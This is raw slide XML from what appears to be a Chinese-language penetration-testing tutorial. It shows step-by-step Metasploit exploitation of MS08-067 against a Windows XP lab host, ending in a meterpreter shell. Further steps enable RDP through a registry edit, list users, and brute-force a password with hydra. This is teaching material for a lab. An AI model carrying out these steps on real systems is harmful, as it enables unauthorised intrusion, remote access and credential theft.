                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:t>命令搜索MS08067漏洞攻击程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="529" name="image68.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="832171" y="6591299"/>
            <a:ext cx="11507682" cy="1927021"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533399" y="4476749"/>
            <a:ext cx="5812520"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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:t>命令调用MS08067漏洞攻击程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="532" name="Shape 532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2473538" y="5428432"/>
            <a:ext cx="6660723"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>use exploit/windows/smb/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="533" name="image69.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="559459" y="6303917"/>
            <a:ext cx="11606481" cy="850823"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Shape 534"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635000" y="654049"/>
            <a:ext cx="2019300"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从结果中得到</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="535" name="Shape 535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="401897" y="1531981"/>
            <a:ext cx="12201005" cy="193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1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Name ： exploit/windows/smb/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Disclosure Date：2008-10-28</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Rank：great </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Description：MS08-067 Microsoft Server Service Relative Path Stack Corruption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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7" name="Shape 537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698499" y="666749"/>
            <a:ext cx="6375988"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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:t> 命令查看需要设置的选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="538" name="image70.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="752292" y="1473144"/>
            <a:ext cx="11122209" cy="4953334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Shape 539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698499" y="6991350"/>
            <a:ext cx="1066292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从图中可以看到还需设置RHOST（目标地址）、Exploit target（攻击目标）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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1" name="Shape 541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="450849"/>
            <a:ext cx="814101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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:t>命令设置 Module Options，此处需要设置目标IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542" name="Shape 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2921000" y="1162049"/>
            <a:ext cx="4456206"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>即 set RHOST 172.16.211.129</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Shape 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="3250439"/>
            <a:ext cx="9233797"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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:t>命令设置后，可再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:t> 命令查看设置情况</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Shape 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="8526801"/>
            <a:ext cx="4524058"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从中可以看出目标IP已经设置好</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="545" name="image71.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="837316" y="2329015"/>
            <a:ext cx="10386953" cy="800576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="546" name="image72.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="861986" y="3930089"/>
            <a:ext cx="10923614" cy="4629677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide7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8" name="Shape 548"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="901699" y="6933140"/>
            <a:ext cx="7558089"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因为实例演示的XP系统为WinXP SP3 简体中文版，即</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Shape 549"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="450849"/>
            <a:ext cx="784097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500"/>
            </a:pPr>
            <a:r>
              <a:t>接着设置Exploit target，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>show targets</a:t>
            </a:r>
            <a:r>
              <a:t> 查看可选项</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="550" name="image73.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538636" y="1719658"/>
            <a:ext cx="8087964" cy="4897173"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1085253"/>
            <a:ext cx="5511800"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可以看出以下版本的系统均存在此漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="552" name="image74.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1622521" y="7615001"/>
            <a:ext cx="7920196" cy="1293682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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5" name="Shape 175"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679576" y="810304"/>
            <a:ext cx="2882647"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DNS记录类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="image8.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2762250" y="1915204"/>
            <a:ext cx="6464300" cy="3924302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="Shape 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742891" y="6750049"/>
            <a:ext cx="1714616"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700"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>查询A记录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="178" name="image9.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1198244" y="7630204"/>
            <a:ext cx="10608311" cy="1291947"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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4" name="Shape 554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="450849"/>
            <a:ext cx="762981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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>set target </a:t>
            </a:r>
            <a:r>
              <a:t>命令设置目标，此处即为</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>set target 34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="555" name="image75.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="850900" y="1181100"/>
            <a:ext cx="11303000" cy="1168400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Shape 556"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761999" y="2749550"/>
            <a:ext cx="11669079"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此时再用show options 可以看到全部设置完成，接着使用exploit 或者 run 进行攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736600" y="4286249"/>
            <a:ext cx="5671536"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500"/>
            </a:pPr>
            <a:r>
              <a:t>执行exploit命令后得到一个</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="558" name="image76.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="945037" y="5362666"/>
            <a:ext cx="11303002" cy="2678748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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0" name="Shape 560"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761998" y="450849"/>
            <a:ext cx="6388358"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500"/>
            </a:pPr>
            <a:r>
              <a:t>在meterpreter中输入</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:t>即可进入CMD窗口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="image77.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="807409" y="1225724"/>
            <a:ext cx="9504992" cy="2150312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="562" name="Shape 562"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761998" y="3702049"/>
            <a:ext cx="6234749"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接着即可执行CMD命令，例如打开RDP服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563" name="Shape 563"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803434" y="4434464"/>
            <a:ext cx="11397933"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="564" name="image78.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="810105" y="5605626"/>
            <a:ext cx="9792560" cy="3230387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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6" name="Shape 566"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="761999" y="450849"/>
            <a:ext cx="9339630"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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netstat -an</a:t>
            </a:r>
            <a:r>
              <a:t>命令查看端口是否开发，从图中可以看到已经开放</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723898" y="4505021"/>
            <a:ext cx="6182405"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500"/>
            </a:pPr>
            <a:r>
              <a:t>接着使用</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>net user</a:t>
            </a:r>
            <a:r>
              <a:t>命令查看XP系统中的用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="568" name="image79.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="826656" y="1283897"/>
            <a:ext cx="9409976" cy="2663202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="569" name="image80.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="772758" y="5232708"/>
            <a:ext cx="9911705" cy="2749985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Shape 570"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="8276922"/>
            <a:ext cx="4800600"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可以看到存在一个用户为sysorem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide8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2" name="Shape 572"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="673100" y="450849"/>
            <a:ext cx="8610600"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然后针对指定用户比如这里的sysorem用户进行登录密码爆破</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="573" name="image81.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="673100" y="2125621"/>
            <a:ext cx="10718421" cy="2327358"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Shape 574"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643466" y="5147732"/>
            <a:ext cx="434848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使用hydra爆破密码得：12345</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="575" name="Shape 575"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729334" y="6401286"/>
